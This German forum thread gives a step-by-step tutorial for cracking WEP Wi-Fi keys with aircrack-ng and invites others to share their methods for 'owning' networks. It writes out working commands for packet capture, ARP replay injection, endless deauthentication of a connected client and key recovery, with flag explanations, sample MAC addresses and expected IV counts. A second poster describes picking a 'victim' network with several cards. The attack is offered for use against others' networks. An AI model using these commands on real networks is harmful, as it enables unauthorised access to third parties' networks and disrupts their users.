(German) Tutorial WEP Crack

[meex]

Hi Jungs.
Mich interessiert wie ihr so eure Netzwerke owned.
Ich mach es folgender Maßen ich bin mir sicher da gibts noch besser schnellere oder andere Wege diese interessiern mich total deswegen postet einfach wie ihr das so macht aber bitte verständlich!

I

 
airodump-ng -w test -c 6 wlan0
1. Airodump-ng startet
2. "-w test" schreibt er alles was er findet in die Datei "test-01.cap"
3. "-c 6" er sucht nur auf Kanal 6 nach Netzwerken andere Frequenzen wie 4,5 oder 7,8 zeigt er manchmal auch an da diese sich mit dem Kanal 6 überschneiden!
4. wlan0 <- Das ist meine Wlankarte nach zuschauen unter "iwconfig".

Hier schreibt er die Capture Datei welche ich wenn ich mehrer Hundertausende IVs habe an Aircrack übergebe dieses knackt dann den KEY

II

 
aireplay-ng -3 wlan0 -b AP_MAC -h CLIENT_MAC -x 1024

0. Aireplay-ng startet
1. -3 Modi in Aireplay
2. wlan0 <- Das ist meine Wlankarte nach zuschauen unter "iwconfig".
3. -b AP_MAC <-- Mac Adresse des Accesspointes welcher mich interessiert und Clients verbunden hat.
4. -h CLIENT_MAC  <-- Mac Adresse des Clients welcher auf dem vorhergenannten AP verbunden ist.
5. -x 1024 <-- Anzahl der Packete 1024 ist der Maximal Wert (Geschwindigkeit)

Hier startet er die Replay Attacke sobald ich den Client rausgeworfen habe und dieser sich neu verbindet

III

 
aireplay-ng -0 0 wlan0 -a AP_MAC -c CLIENT_MAC

0. Aireplay-ng startet
1. -0 Modi zum Deauthen im Aireplay
2. 0 <-- führt vorhergenanten befehl unendlich aus. schreibt man z.b. 6 dann führt er den befehl 6 mal aus
3. wlan0 <- Das ist meine Wlankarte nach zuschauen unter "iwconfig".
4. -a AP_MAC  <-- Mac Adresse des Accesspointes welchen ich auch schon in aireplay-ng -3 siehe II angegeben habe
5. -c CLIENT_MAC <-- Mac adresse des Clients welchen ich auch schonmal oben angegeben habe siehe II

Hiermit werfe ich den Client raus! Er verbindet sich neu, genau das will ich!

Am Ende wenn airodump genung Data hat übergebe ich das Packet an Aircrack und fertig ist es :-)


So jetzt interessiert es mich wie ihr das soo macht?

[ASPj]

1. Mit Kismet und drei WLAN Karten gleichzeitig ein Opfer suchen
2. Mit allen Karten auf den Channel des Opfers locken (drei Augen sehen mehr als eins  )
3. airodump auf der rausb0 anhauen
4. einen Client faken mit der rausb0
5. Wenn schon ein Data da ist, choppen, wenns nicht will, mit -h Option
6. Mit arpforge irgendein ARP Packet machen (richtig, IRGENDEINS, Broadcast forwarden geht schneller als antworten für den AP)
7. Kismet beenden, mit der rausb0 Pakete rainballern
8. Ne Kippe rauchen
9. Key found.

[meex]

Diese Anleitung bezieht sich auf „backtrack-v.1.0-260506.iso“ mit der W-Lan Karte
„Senao 2511CD PLUS EXT2“.

Besorgt euch im Internet „backtrack-v.1.0-260506.iso“.
Booten, anmelden User: „root“ Passwort: „toor“.

Dann folgendes eingeben:

I loadkeys de-latin1.map
Dieser Befehl stellt die Tastatur auf „Deutsch“ um.

II switch-to-hostap
Hier wechselt Backtrack zum „Hostap“ Treiber.

III airmon-ng start wlan0
Das airmon-ng script versetzt meine W-LAN  Karte in den Monitor Mode.
Wie eure W-Lan Karte heißt könnt ihr mit dem Befehl „iwconfig“ nachschauen.

IV airodump-ng –w sniff –c 6 wlan0
-w sniff  schreibt alles in die Datei „sniff-01.cap“
-c 6  sucht nur auf dem Kanal 6
wlan0  das ist mein Interface (W-Lan Karte)

V aireplay-ng -3 wlan0 –b 00:11:C6:39:4F:27 –h 00:11:C6:23:12:50 –x 1024
-3  aireplay-ng wartet auf einen ARP Request und sobald es einen hat injiziert es dieses ständig in das W-Lan
wlan0  das ist mein Interface (W-Lan Karte)
–b 00:11:C6:39:4F:27  MAC Adresse des Accesspointes
–h 00:11:C6:23:12:50  MAC Adresse des Clients
-x 1024  Geschwindigkeit der Pakete pro Sekunde welche injiziert werden

VI aireplay-ng -0 0 wlan0 –a 00:11:C6:39:4F:27 –c 00:11:C6:23:12:50
-0 0  aireplay-ng wirft den Client aus dem Netzwerk und zwar unendlich oft das gibt die 2te “0” an. Schreibt man zum Beispiel „-0 8“, dann schmeißt er den Client 8-mal hintereinander raus. 4-mal sollte normalerweise genügen. Befehlt abbrechen mit „Strg-C“.
wlan0  das ist mein Interface (W-Lan Karte)
–a 00:11:C6:39:4F:27  MAC Adresse des Accesspointes
–c 00:11:C6:23:12:50  MAC Adresse des Clients


I II III ausführen
IV starten und laufen lassen
V  starten und laufen lassen
VI 4-mal den einzelnen befehl ausführen, dann befehl mit Strg-C abbrechen. Warten ob V einen ARP bekommt, nun IV beobachten und freuen dass die Data ganz schnell steigt.

Ganz unterschiedlich aber normalerweise reichen 500 000 IVs aka DATA. Dann

aircrack-ng -a 1 -b 00:11:C6:39:4F:27 -n 128 sniff-01.cap
-a 1 <-- gibt an das der KEY WEP ist
-b 00:11:C6:39:4F:27 <--MAC Adresse des APs
-n 128 <-- 128 Bit KEY ( Standard)
sniff-01.cap <-- die oben angelegt Datei von Airodump-ng
laufen lassen nach ca 1 Sekunde - 1 Stunde hat er den Key je mehr IVs desto besser beim aller leichtesten fall 64 Bit WEP brauchten wir 125 000 IVs und beim härtesten Fall 2 000 000 IVs.


falls nix rauskommt

einfach mal aircrack-ng eingeben und Syntax anschauen!